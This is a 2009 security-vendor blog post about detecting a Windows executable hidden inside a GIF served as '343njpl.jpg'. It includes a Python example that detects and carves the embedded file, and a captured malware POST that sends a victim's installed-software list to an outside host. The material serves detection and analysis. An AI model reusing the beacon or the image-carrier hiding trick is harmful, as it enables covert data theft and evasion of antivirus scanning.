The Power of Realtime Network Forensics – Advanced Malware Detection
November 27, 2009 | Network Visibility, network forensics
Hey gang…Alex here…writing from the NetWitness Labs…
At NetWitness, our focus is on providing analytics, and we are constantly looking for new ways to apply those analytics to content development: parsers, rules and feeds. We know we have really cool technology and want to showcase it while pushing the envelope of what is possible in this space. If you’ve seen the recent rule update on the freeware welcome page, you are seeing the results of these efforts first-hand.
If you’ve been following the threat landscape for the past few years, you know without question that malware is a key part of both cybercriminal and nation-state hacking activity. You also know that current security technologies are woefully inadequate at detecting targeted and obfuscated malware. Keeping a network secure requires knowledge of what is normal on your network, as well as cutting-edge technology that quickly makes you aware of deviations from that normal.
Part of this concept is using knowledge of what is “normal” to define what is “abnormal”. In this example I’ll use Windows executables. We know from common IT knowledge that Windows executables usually carry an “.exe” extension (among others, such as .dll, .sys and .scr). Those with a forensic background also know that Windows executables are forensically identifiable by a file signature with well-known “tells”. The clearest is the “MZ” header: every PE (Portable Executable) file begins with the two ASCII bytes “MZ”, which open the DOS stub header, and the 4-byte little-endian value at offset 0x3C of that header (e_lfanew) points to the “PE\0\0” signature that starts the PE header proper. Checking both is what makes the tell reliable; “MZ” on its own is just two bytes that can occur by chance in any data.
If I take these existing bits of knowledge and combine them, I have the basis for a detection of “abnormal” executables as follows:
“If forensic signature equals windows executable, but the file extension doesn’t equal a known executable extension, let me know about it!”
With this concept in mind, one of my extremely talented coworkers (Gary Golomb) put together a flex parser with the sole purpose of detecting file signatures on the wire. Think of a forensic analysis of file types, as you would do with a dedicated host forensic tool like EnCase or Forensic Toolkit (FTK), but on the network and in real time. We’ve been testing this parser in a variety of scenarios, and recently made an interesting discovery while at a client site.
During this engagement, we began investigating hits on our “file signature windows executable” parser, which is designed to generate “alert” metadata in the NetWitness framework when it detects the forensic tells of an executable.

Meet 343njpl.jpg:
One of the files that triggered this alert was downloaded from the “tinypic.com” file hosting service and was named 343njpl.jpg:

When I look at this file forensically, I see an interesting inconsistency. The file header identifies the file as a GIF (the file starts with the “GIF8” signature rather than the JPEG marker bytes FF D8 FF), not a JPG. Something is amiss!

Digging further…I see that there is, in fact, an MZ/PE executable header buried deeper in the file:

What’s interesting to note here is that this file renders correctly as a GIF in a web browser, so if you were to wander across it during an investigation, it would not be readily apparent that it is hiding an executable. Image decoders stop at the GIF trailer and ignore whatever follows, so extra data at the end of the file does not affect rendering at all.
With this new knowledge, we then submitted the file to VirusTotal to determine whether it was known to be malicious. The results were not promising: 3 detections out of 41 engines.
At this point we really wanted to dig deeper and figure out what this file was trying to do, so we opened the file in a hex editor, carved the EXE out of the file, and resubmitted it to VirusTotal. The results were much better this time, but still only about 65%: 27 detections out of 41.
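The chain described above, from the “executable tells that disagree with the extension” rule through locating the buried MZ/PE header and carving the executable out of the carrier, as an added Python example. This is not NetWitness’s flex parser nor code from the post; the function names, the extension list and the validation logic are this example’s own assumptions. The sample file is constructed inline: a tiny GIF, padding that contains a decoy “MZ” which is not a PE header, and a skeletal, non-runnable PE image appended after the image.

```python
import os
import struct

# Extensions under which a PE image is expected; anything else is "abnormal".
EXE_EXTS = {"exe", "dll", "sys", "scr", "cpl", "ocx"}

# Magic bytes at offset 0 for a few common types (extend as needed).
MAGIC_SIGNATURES = [
    ({"gif"}, b"GIF87a"),
    ({"gif"}, b"GIF89a"),
    ({"jpg", "jpeg"}, b"\xff\xd8\xff"),
    ({"png"}, b"\x89PNG\r\n\x1a\n"),
    (EXE_EXTS, b"MZ"),
]


def identify_by_magic(data):
    """Return the extensions implied by the leading magic bytes, or None."""
    for exts, magic in MAGIC_SIGNATURES:
        if data.startswith(magic):
            return exts
    return None


def find_pe_offsets(data):
    """Offsets of every 'MZ' that is confirmed by a PE signature.

    'MZ' is only two ASCII bytes and shows up by chance, so each hit is
    validated: e_lfanew (little-endian u32 at MZ+0x3C) must point at 'PE\\0\\0'.
    """
    found = []
    idx = data.find(b"MZ")
    while idx != -1:
        if idx + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, idx + 0x3C)[0]
            pe = idx + e_lfanew
            if e_lfanew >= 0x40 and data[pe:pe + 4] == b"PE\x00\x00":
                found.append(idx)
        idx = data.find(b"MZ", idx + 1)
    return found


def analyze(filename, data):
    """Apply the rule: executable tells that disagree with the file extension."""
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    declared = identify_by_magic(data)
    pe_offsets = find_pe_offsets(data)
    alerts = []
    if declared is not None and ext not in declared:
        alerts.append("header says %s, extension says .%s" % (sorted(declared), ext))
    for off in pe_offsets:
        if off == 0 and ext in EXE_EXTS:
            continue  # an executable that looks like one: normal
        alerts.append("PE image at offset 0x%x inside a .%s file" % (off, ext))
    return {"extension": ext, "declared": declared,
            "pe_offsets": pe_offsets, "alerts": alerts}


def carve_pe(data, offset):
    """Cut the PE at `offset` out of its carrier, sized from the section table.

    Data placed after the last section (an overlay) is not carved.
    """
    e_lfanew = struct.unpack_from("<I", data, offset + 0x3C)[0]
    pe = offset + e_lfanew
    num_sections = struct.unpack_from("<H", data, pe + 6)[0]
    size_opt_hdr = struct.unpack_from("<H", data, pe + 20)[0]
    sect_table = pe + 24 + size_opt_hdr
    end = e_lfanew + 24 + size_opt_hdr + 40 * num_sections  # at least the headers
    for i in range(num_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", data, sect_table + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return data[offset:offset + end]


def build_fake_pe():
    """Constructed PE skeleton (headers plus one 16-byte section); it does not run."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PtrSymTab, NumSyms,
    # SizeOfOptionalHeader (0 here, to keep the sample short), Characteristics
    coff = b"PE\x00\x00" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x0102)
    raw_ptr = e_lfanew + 24 + 40  # section data sits right after the headers
    section = b".text\x00\x00\x00" + struct.pack(
        "<IIIIIIHHI", 16, 0x1000, 16, raw_ptr, 0, 0, 0, 0, 0x60000020)
    return dos_header + coff + section + b"\xcc" * 16


# Constructed carrier: a 1x1 GIF, padding with a decoy "MZ", then the PE image.
GIF_IMAGE = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00"
             b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
DECOY = b"AMZING" + b"\x00" * 60          # "MZ" with no PE signature behind it
FAKE_PE = build_fake_pe()
SAMPLE = GIF_IMAGE + DECOY + FAKE_PE + b"\x00" * 8
PE_OFFSET = len(GIF_IMAGE) + len(DECOY)

if __name__ == "__main__":
    result = analyze("343njpl.jpg", SAMPLE)
    for alert in result["alerts"]:
        print("ALERT:", alert)
    carved = carve_pe(SAMPLE, result["pe_offsets"][0])
    print("carved %d bytes; identical to embedded image: %s"
          % (len(carved), carved == FAKE_PE))
```

Run against the constructed sample, `analyze` raises two alerts (a GIF header on a “.jpg” name, and a PE image at a non-zero offset), while the decoy “MZ” in the padding is rejected because its e_lfanew does not lead to “PE\0\0”. `carve_pe` returns the embedded image byte-for-byte, which is the artifact you would hand to VirusTotal or a sandbox instead of the carrier GIF.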
OK…so we now know that this file is indeed malicious. What does it actually do? Using some basic dynamic malware analysis, we discover that it first reports the installed applications to a web server in the Netherlands. (The inventory in the POST below is that of our analysis VM, which is why it is full of reverse-engineering tools.)
POST /65/logpl.php HTTP/1.1
Referer: http://google.com/
Content-Type: application/x-www-form-urlencoded
User-Agent: hello
Host: www2.sexown.com
Content-Length: 692
Cache-Control: no-cache

pl=plV:1.1|Adobe_Flash_Player_10_ActiveXV:10.0.22.87|Explorer_Suite_III|IDA_Pro_Demo_v5.4|InstallWatch_Pro_2.5|Malcode_Analyst_Pack_v0.21|Microsoft_.NET_Framework_3.5_SP1|Mozilla_Firefox_(3.5)V:3.5 (en-US)|Notepad++V:5.4.4|Paros_3.2.13|Windows_XP_Service_Pack_3V:20080414.031525|WinPcap_4.1_beta5V:4.1.0.1452|Wireshark_1.2.0V:1.2.0|Mandiant_Red_CurtainV:1.0.0|Python_2.6.2V:2.6.2150|Java(TM)_6_Update_14V:6.0.140|WebFldrs_XPV:9.50.7523|Mandiant_Web_HistorianV:1.3.0|Mandiant_HighlighterV:1.1.1|MemoryzeV:1.3.1000|Microsoft_.NET_Framework_3.0_Service_Pack_2V:3.2.30729|Microsoft_.NET_Framework_2.0_Service_Pack_2V:2.2.30729|Microsoft_.NET_Framework_3.5_SP1V:3.5.30729|VMware_ToolsV:7.9.6.5197|
So let’s review the facts:
- A file that strays from the expected norm (an executable signature with no executable extension) was detected by NetWitness technology while being served from a common file hosting site.
- This file renders properly as a GIF in a web browser, but contains an embedded executable.
- Malware detection on this sample in its embedded form is dismal (3 of 41 engines), but improves once the executable is carved out of the GIF (27 of 41).
- Using behavioral analysis, we can determine that the embedded executable is an information stealer, at the very least. Its beacon is also easy to spot on the wire: a User-Agent of “hello”, a Referer of http://google.com/ on a POST to an unrelated host, and a pipe-delimited software inventory in the body.
Tied to an alerting mechanism in NetWitness Informer, this alert could be sent directly to an enterprise SOC for response, informing them of unusual executable activity without having to rely on signature-based malware controls!
NetWitness….letting you see your network like never before.
